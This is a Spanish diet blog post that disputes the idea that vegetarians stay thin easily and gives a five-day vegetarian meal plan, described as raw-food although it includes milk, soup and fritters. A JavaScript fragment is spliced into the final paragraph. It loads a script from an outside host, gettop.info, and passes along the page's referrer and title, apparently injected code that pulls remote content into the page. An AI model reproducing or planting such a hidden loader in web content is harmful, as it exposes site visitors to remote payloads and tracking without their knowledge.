Salud y belleza » Alimentación, Dieta

Pensando en verde

1 Comentario

Se ha instalado un mito -falso, por cierto- en torno a los vegetarianos y su peso. Muchos suponen que, por no ingerir alimentos derivados de la carne, un individuo puede mantenerse delgado sin mayores problemas. Esto es una gran mentira.

Efectuar una dieta es un ejercicio complicado para todos: vegetarianos o no vegetarianos. Más aún: al menos en lo que a la selección de alimentos se refiere, es una tarea de mayor desgaste hallar un plan para un vegetariano pues éste se ve condicionado por circunstancias lógicas. Pero por suerte para todos ellos, es sumamente popular la cocina naturista por lo que escoger un plan alimenticio ya no es una tarea imposible: la dieta crudívora, exclusiva para vegetarianos amantes de las frutas y verduras sin conservantes ni agregados, confirma nuestra teoría y nos da la razón.

verde

Lunes

Desayuno: un vaso de leche desnatada y una manzana.

Mediamañana: un vaso de jugo de zanahoria, apio y remolacha.

Comida: una ensalada de lechuga, tomates, cebolla, hinojo y apio aliñada con aceite de oliva, zumo de limón, sal y pimienta; un plato de gazpacho; fruta a elección.

Tarde: una pera pequeña.

Cena: ensalada de brotes de soja, alfalfa, zanahoria rallada, radicheta y cebolla aliñada con aceite de oliva, zumo de limón, sal y pimienta; fruta a elección.

Martes

Desayuno: un vaso de leche desnatada y 1 porción de melón o sandía

Mediamañana: un yogurt descremado.

Comida: ensalada de tomate y tofu aderezada con albahaca picada, aceite de oliva, sal y pimienta; jugo de manzana y zanahoria; fruta a elección.

Merienda: uvas (una porción).

Cena: una ensalada de cebollas, naranja, tomates y almendras aliñada con aceite de oliva, jugo de limón, sal y pimienta; una fruta.

Miércoles

Desayuno: un yogur desnatado y un melocotón.

Mediamañana: jugo de remolacha, manzana y apio.

Comida: buñuelos de trigo con puré de tomates, ajo, aceite de oliva y un chorrito de vinagre; ensalada de frutas.

Merienda: una manzana.

Cena: ensalada de hojas de espinaca, brotes de alfalfa, tomates y nueces aliñada con aceite de oliva, vinagre de manzana, sal y pimienta.

Jueves

Desayuno: un licuado de banana y leche; dos melocotones.

Mediamañana: un yogurt desnatado.

Comida: budín de semillas; jugo de manzana, melocotón y zanahoria; fruta a elección.

Merienda: un kiwi.

Cena: ensalada de naranjas, repollo blanco cortado en tiras, pasas de uva y semillas de sésamo aliñada con aceite de oliva, jugo de limón, sal y pimienta; fruta a elección.

Viernes

Desayuno: un licuado de melocotón y leche; una manzana.

Mediamañana: ensalada de frutas

Comida: plato de sopa de crema de zanahorias; ensalada de lechuga, tomates, cebollas, apio y manzana aliñada con aceite de oliva, jugo de limón, sal y pimienta; fruta a elección.

Merienda: un yogurt descremado.

Cena: ensalada de repollo colorado, zanahoria y manzana rallada, brotes de soja y alfalfa aderezada con aceite de oliva, jugo de limón y naranja, sal y pimienta; fruta a elección.

Los días restantes, sábados y domingos, se puede aplicar cualquier plan utilizado en los anteriores cinco días semanales.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • Blogueando La Cocina » Dieta para vegetarianos - dieta vegetariana said:

    [...] Cena: ensalada de naranjas, repollo blanco cortado en tiras, pasas de uva y semillas de sésamo aliñada con aceite de oliva, jugo de limón, sal y pimienta; fruta a elección. Viernes. Desayuno: un licuado de melocotón y leche; … Excerpt from:  Dieta para vegetarianos – dieta vegetariana [...]

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.